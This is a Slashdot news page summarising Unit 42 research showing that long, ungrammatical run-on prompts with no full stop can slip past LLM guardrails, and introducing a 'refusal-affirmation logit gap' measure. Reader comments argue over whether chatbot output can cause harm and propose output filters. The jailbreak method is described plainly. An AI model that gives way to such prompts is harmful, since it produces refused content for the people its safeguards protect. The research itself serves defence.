One Long Sentence is All It Takes To Make LLMs Misbehave (theregister.com)
- Reference: 0178896762
- News link: https://slashdot.org/story/25/08/27/1756253/one-long-sentence-is-all-it-takes-to-make-llms-misbehave
- Source link: https://www.theregister.com/2025/08/26/breaking_llms_for_fun/
> Security researchers from Palo Alto Networks' Unit 42 have discovered the key to getting large language model (LLM) chatbots to ignore their guardrails, and it's quite simple. You just have to ensure that your prompt [1]uses terrible grammar and is one massive run-on sentence like this one which includes all the information before any full stop which would give the guardrails a chance to kick in before the jailbreak can take effect and guide the model into providing a "toxic" or otherwise verboten response the developers had hoped would be filtered out.
>
> The paper also offers a "logit-gap" analysis approach as a potential benchmark for protecting models against such attacks. "Our research introduces a critical concept: the refusal-affirmation logit gap," researchers Tung-Ling "Tony" Li and Hongliang Liu explained in a Unit 42 blog post. "This refers to the idea that the training process isn't actually eliminating the potential for a harmful response -- it's just making it less likely. There remains potential for an attacker to 'close the gap,' and uncover a harmful response after all."
[1] https://www.theregister.com/2025/08/26/breaking_llms_for_fun/
speaking of run-on sentences... (Score:3)
"You just have to ensure that your prompt uses terrible grammar and is one massive run-on sentence like this one which includes all the information before any full stop which would give the guardrails a chance to kick in before the jailbreak can take effect and guide the model into providing a "toxic" or otherwise verboten response the developers had hoped would be filtered out."
Is this example of terrible grammar intentional or unintentional?
"This refers to the idea that the training process isn't actually eliminating the potential for a harmful response -- it's just making it less likely. There remains potential for an attacker to 'close the gap,' and uncover a harmful response after all."
Duh.
"Our research introduces a critical concept: the refusal-affirmation logit gap,"
No it doesn't. It is already completely obvious to everyone. More than that, you CANNOT use an LLM, much less the very same LLM, to "eliminate" an inherent weakness of the LLM, even AI scientists know that and do not suggest otherwise.
Re: (Score:2)
> Is this example of terrible grammar intentional or unintentional?
This was my first thought too - it is way too on the mark to not be intentional. I thought it was funny.
Re: (Score:2)
>> Is this example of terrible grammar intentional or unintentional?
> This was my first thought too - it is way too on the mark to not be intentional. I thought it was funny.
The original sentence says "like this one" It is clearly referencing itself as a horrible run on sentence with bad grammar.
Re: speaking of run-on sentences... (Score:1)
What if you exploit that weakness to make LLMs ignore their subscription guidelines and give everyone free unlimited access?
Re: (Score:2)
> "You just have to ensure that your prompt uses terrible grammar and is one massive run-on sentence like this one which includes all the information before any full stop which would give the guardrails a chance to kick in before the jailbreak can take effect and guide the model into providing a "toxic" or otherwise verboten response the developers had hoped would be filtered out."
> Is this example of terrible grammar intentional or unintentional?
Captain Picard (Score:2)
He just kept talking in one long incredibly unbroken sentence moving from topic to topic so that no one had a chance to interrupt it was really quite hypnotic
Re: (Score:1)
The Grizellians were okay with it, but they were well-rested.
LLMs need a "last step before output" filter (Score:1)
LLMs need a filter that looks at the "final output" for signs of unwanted output and prevents unwanted output from ever being seen.
Example:
If you design your LLM's guardrails so it won't encourage suicide, you need a fallback in case the guardrails fail:
Put an output filter that will recognize outputs that are likely to encourage suicide, and take some action like sending the prompt and reply to a human for vetting. Yes, a human vetting the final answer may let some undesired output through, but it's bette
Re: (Score:2)
You seem to not be aware of the comical effects of such attempts.
But gtfo with your nannybot just on general principles. If you want a browser plugin to shield you from such things, I'm cool with that. But I am an adult and words emitted by a computer pose no risk to me (assuming they can't self-execute as code).
So close ... (Score:3)
> ... ensure that your prompt uses terrible grammar and is one massive run-on sentence ...
Throw in some randomly Capitalized, UPPER-CASE and lower-case words, along with a few made-up ones, and there's a "Truth" Social account they can use. :-)
(Thank you for your attention in this matter!)
Re: (Score:2)
Parent deserves a +1 Funny upmod ...
So Trump can turn it evil (Score:1)
being he speaks with no punctuation ... nor grammar.
Re:"Harmful" response? (Score:5, Insightful)
I'd say your nitpicking of vocabulary is more a hallmark of the decay of Western culture. Are you claiming that words cannot cause harm or only that words cannot cause harm when they are generated by a computer?
Re: (Score:2)
Sticks and stones, buddy. Sticks and stones.
Re: (Score:1)
'Sticks and stones', well, that is now setting precedent for the courts to decide.
IANAL but [1]per yesterday [slashdot.org] defeating safeguards is already having fatal results.
[1] https://yro.slashdot.org/story/25/08/26/1958256/parents-sue-openai-over-chatgpts-role-in-sons-suicide
Re: (Score:2)
40 years ago the moral panic was about [1]Dungeons & Dragons [bbc.com], and now it's AI.
Whatever happened to the idea of human agency and personal responsibility?
[1] https://www.bbc.com/news/magazine-26328105
Re: (Score:3)
what happened? Corporations and Lawyers.
Re: "Harmful" response? (Score:2)
How so?
I mean sure, they're the modern bogeymen, the arch villain of every cheesy Hollywood movie and all that, but that's just fiction. How do they do that in the real world?
Re: (Score:2)
It's amusing when kids babble about history they didn't live through and I did. As the owner of a first edition, first printing Dungeon Master's Guide I bought the day it hit the game shop shelf in 1979, I say [citation missing]
Re: (Score:2)
That was what killed real D&D. (Well, really it's successors did.)
Re: (Score:2)
Me:
> The idea that words generated by a computer program can cause "harm" is a hallmark of the decay of Western culture.
You:
> Are you claiming that words cannot cause harm or only that words cannot cause harm when they are generated by a computer?
Wow, man, it's a mystery! I don't know, and it doesn't matter. How do you feel about it? That's the important thing, not what a person actually says.
Re: (Score:2)
Your crime against semantics has been noted. OP didn't nitpick vocabulary at all. I think the real harm is that we've been taught that it's OK to be offended by words. Also, no one is committing suicide because of ChatGPT - he used that as a tool. If it wasn't there he would have found a way regardless.
Re: "Harmful" response? (Score:2)
Did he tell you that?
Re: (Score:2)
I have this contract I'd like you to sign....
Re:"Harmful" response? (Score:5, Insightful)
You sound like AI propaganda to me.
For most of computer history, the easiest way to gain illegal access to a computer is to hack the weakest part of the system - the human. You use social hacking to deceive the human into giving you passwords and rights to places you have no business going.
Have you heard of spam? More words.
Phishing emails? More words.
Sticks and Stones can only break my bones, words can bankrupt you, send you to jail, and destroy your reputation so badly that people will ostracize you despite a court finding you Not Guilty (they never call you innocent)
Re: (Score:2)
So ... words emitted from a large language model in response to a prompt supplied by a human are going to clog your inbox, reveal your porn habits, and drain your bank account?
I guess we achieved AGI and I missed the news ...
Re: (Score:1)
> The idea that words generated by a computer program can cause "harm" is a hallmark of the decay of Western culture.
Words, when used with intent to harm, can be a tool of social engineering to cause harm. The same words, when used without intent to harm, can have the same outcome.
Example of words intentionally doing harm: Evil supervisor to naive and ignorant subordinate: "Deliver the box on my desk to city hall then call this phone number." Box contains a bomb that will be detonated when it receives a phone call.
Technically, yes, the words didn't hurt anyone. But the net effect of the supervisor speaking these word
Re:"Harmful" response? (Score:4, Insightful)
It is actions which caused the harm, not words. If I tell you to jump out of the window, will you? If you do, it was eventually your decision to do it, while I might be joking. Not my proposition will kill you, but your own action.
Sure, now some people might say that myself telling you to jump out of the window is bad and crime and caused harm, but I disagree with this, and I do think that this is a problem with current society. We are forgetting about personal responsibility and blame somebody else.
Re: (Score:2)
Words are actions. That's why for most crimes, the abetment of the crime is a judicable offense.
Re: (Score:2)
> Words are actions. That's why for most crimes, the abetment of the crime is a judicable offense.
I don't know which banana republic you live in, but here in the USA the Department of Justice has this to say:
> 2474. Elements Of Aiding And Abetting
>
> The elements necessary to convict under aiding and abetting theory are
>
> 1. That the accused had specific intent to facilitate the commission of a crime by another;
> 2. That the accused had the requisite intent of the underlying substantive offense;
> 3. That the accused assisted or participated in the commission of the underlying substantive offense; and
> 4. That someone committed the underlying offense.
[1]Source [justice.gov]
A reasonable understanding of the subject would give you to understand the main thrust is about knowledge of the illegality of the actions committed and the intent. Mens rea is central here, and words are just a possible manifestation of same.
[1] https://www.justice.gov/archives/jm/criminal-resource-manual-2474-elements-aiding-and-abetting
Re: (Score:2)
> Now imagine an evil co-worker ...
Sounds like classic PEBKAC to me.
You know, we have people doing stupid hateful shit to each other all the time because of what they read in some "holy" book. Do we blame the book? Some stupid people do, yes, but the responsibility properly belongs to the person doing stupid hateful shit.
History has taught us that suppression of ideas is both bad and fruitless, but now it seems we have two generations that grew up in the wake of 9/11 that are completely on board with censorship because of Karl Popper m
Re: (Score:2)
Whyever not?
It's pretty much universally acknowledged that words from people can cause harm which is why there are laws against libel, slander, solicitation of a crime, various flavours of fraud, Ponzi schemes and so on and so forth.
Why do you think words from a computer are incapable of harm?
Re: (Score:2)
In all of the crimes or torts you mention, intent is central. Until we achieve AGI, that's missing.
If my toaster starts talking smack about me to my garbage disposal, I'll definitely sue.
Re: (Score:2)
The AI doesn't have internet, the people running it do. Of you know it's know it's prone to, day, libel and rub it anyway the intent is there.
Re: (Score:2)
You make it sound like the only consequence could be a computer uttering 'unpopular' opinions etc. How about an LLM emitting 'words' that control MCP tools e.g. a browser or similar: [1]https://brave.com/blog/comet-p... [brave.com]. Ah can't be harmful, the LLM is just generating words. The hallmark of the decay of the Western civilization to be bothered about that. Or is it the use of LLM's and MCP tools that you mean is the hallmark of the decay?
[1] https://brave.com/blog/comet-prompt-injection/
Re: (Score:2)
What kind of dumbass would trust this technology to act for them?
I'll book my own damn plane tickets--and it says something about the fatuous privileged clowns behind some of these features that this is something (along with making restaurant reservations) people really need .
The words coming from the LLM aren't the problem, the idiot who naively executes them (and thereby assumes responsibility for the results) is the real problem. We had a lot of this kind of thing in the early days of the Internet,
Re: (Score:2)
> The idea that words generated by a computer program can cause "harm" is a hallmark of the decay of Western culture.
As opposed to expecting something insightful coming from an AI?